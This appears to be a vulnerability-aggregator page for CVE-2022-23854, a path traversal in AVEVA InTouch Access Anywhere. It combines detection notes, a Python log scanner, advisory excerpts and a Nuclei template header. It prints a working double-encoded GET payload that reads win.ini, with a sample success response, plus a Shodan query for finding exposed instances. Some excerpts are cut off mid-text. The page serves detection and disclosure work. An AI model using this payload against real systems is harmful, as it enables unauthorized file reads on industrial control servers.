CVE-2022-23854
Published: 2022-12-23
Priority: P2 73, high; CVSS 3.1 base score 7.5
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploit: public
EPSS: 45.96% (98.7th percentile)
AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aveva | intouch_access_anywhere | < 2020 | 2020 |
| aveva | intouch_access_anywhere | <= 2020 R2 | — |
| aveva | intouch_access_anywhere | — | — |
Detection & IOCs
url: /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
sigma
shodan-query: http.html:"InTouch Access Anywhere"
- HTTP GET requests to /AccessAnywhere/ containing double-percent-encoded path traversal sequences (%252e%252e%255c) targeting Windows files (e.g., windows%255cwin.ini) are indicative of CVE-2022-23854 exploitation attempts.
- Successful exploitation returns HTTP 200 with Content-Type 'text/ini' or 'application/octet-stream' and body containing 'for 16-bit app support' and 'extensions', indicating win.ini was read from the server.
- The vulnerability is unauthenticated and exploitable remotely with low attack complexity; monitor for unauthenticated access to the /AccessAnywhere/ endpoint with encoded dot-dot-backslash sequences in the URI.
- Identify exposed AVEVA InTouch Access Anywhere instances via Shodan (http.html:"InTouch Access Anywhere") or FOFA (body="intouch access anywhere") to assess attack surface.
- The path traversal payload uses double percent-encoding (%252e%252e%255c) to bypass input validation; detection rules must account for this double-encoded form rather than standard ../ sequences.
- Affected versions are InTouch Access Anywhere 2020 R2 and older (CVE-2022-23854 specific); the CISA Update A advisory expanded affected scope to InTouch Access Anywhere 2023 and prior for related CVEs, but CVE-2022-23854 path traversal applies to 2020 R2 and older.
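
The decoding requirement in the notes above, as an added example (not part of the original page or of any vendor tooling): a log scanner that percent-decodes the request path repeatedly before looking for `..` segments under /AccessAnywhere/, so the double-encoded and plain forms are caught by the same check. The combined-style access log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line and status inside a combined-style access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PREFIX = "/accessanywhere/"
MAX_ROUNDS = 5  # bound the decode loop so deeply nested encodings cannot spin it

# Constructed sample lines: double-encoded traversal, plain ../ traversal, benign request.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Nov/2022:10:01:02 +0000] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 200 92',
    '198.51.100.7 - - [12/Nov/2022:10:01:05 +0000] "GET /AccessAnywhere/../../windows/win.ini HTTP/1.1" 404 0',
    '203.0.113.20 - - [12/Nov/2022:10:02:11 +0000] "GET /AccessAnywhere/start.html HTTP/1.1" 200 5120',
]


def decode_fully(target):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds


def classify(line):
    """Return a finding dict for a traversal attempt, or None for any other line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded, rounds = decode_fully(m["target"].split("?", 1)[0])
    normalized = decoded.replace("\\", "/").lower()  # treat \ and / alike, as Windows does
    if not normalized.startswith(PREFIX):
        return None
    if ".." not in normalized[len(PREFIX):].split("/"):
        return None
    return {"status": int(m["status"]), "encoding_rounds": rounds,
            "decoded_path": decoded, "served": m["status"] == "200"}


def scan(lines):
    """Collect findings for every line that decodes to a traversal under the prefix."""
    return [finding for finding in map(classify, lines) if finding]
```

A finding with `served` set to true matches the HTTP 200 success condition described above and warrants checking the response body markers; `encoding_rounds` of 2 corresponds to the `%252e%252e%255c` form.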
CISA ICS
AVEVA InTouch Access Anywhere and Plant SCADA Access Anywhere (Update A)
cisa_ics·2022-12-08·CVSS 7.5
[HIGH] AVEVA InTouch Access Anywhere and Plant SCADA Access Anywhere (Update A)
ICS Advisory
Last Revised: March 16, 2023
Alert Code: ICSA-22-342-02
## 1. EXECUTIVE SUMMARY
--------- Begin Update A Part 1 of 6 ---------
- CVSS v3 9.8
--------- End Update A Part 1 of 6 ---------
- ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
- Vendor: AVEVA
--------- Begin Update A Part 2 of 6 ---------
- Equipment: InTouch Access Anywhere, Plant SCADA Access Anywhere
- Vulnerability: Relative Path Traversal, Classic Buffer Overflow, Cross-site Scripting
--------- End Update A Part 2 of 6 ---------
## 2. UPDATE INFORMATION
This updated advisory is a follow-up to the original advisory titled ICSA-22-342-02 AVEVA InTouch Access Anywhere, publ
GHSA
GHSA-ccvr-7m85-7g88: AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with netw
ghsa_unreviewed·2022-12-23
CVE-2022-23854 [HIGH] CWE-22 GHSA-ccvr-7m85-7g88: AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with netw
AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.
No detection rules found.
Exploit-DB
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
exploitdb·2022-11-11·CVSS 7.5
CVE-2022-23854 [HIGH] AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
---
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older
Proof of Concept:
```
GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
Nuclei
AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
nuclei·CVSS 7.5
CVE-2022-23854 [HIGH] AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
Template:
```yaml
id: CVE-2022-23854

info:
  name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
  author: For3stCo1d
  severity: high
  description: |
    AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
  impact: |
    An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.
  remediation: |
    Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/cve/CVE-2022-23854
    - https://www.aveva.com
    - https://crisec.de/advisory-aveva-int
```
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
- https://www.aveva.com/content/dam/aveva/documents/support/cyber-security-updates/SecurityBulletin_AVEVA-2023-001_r.pdf
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02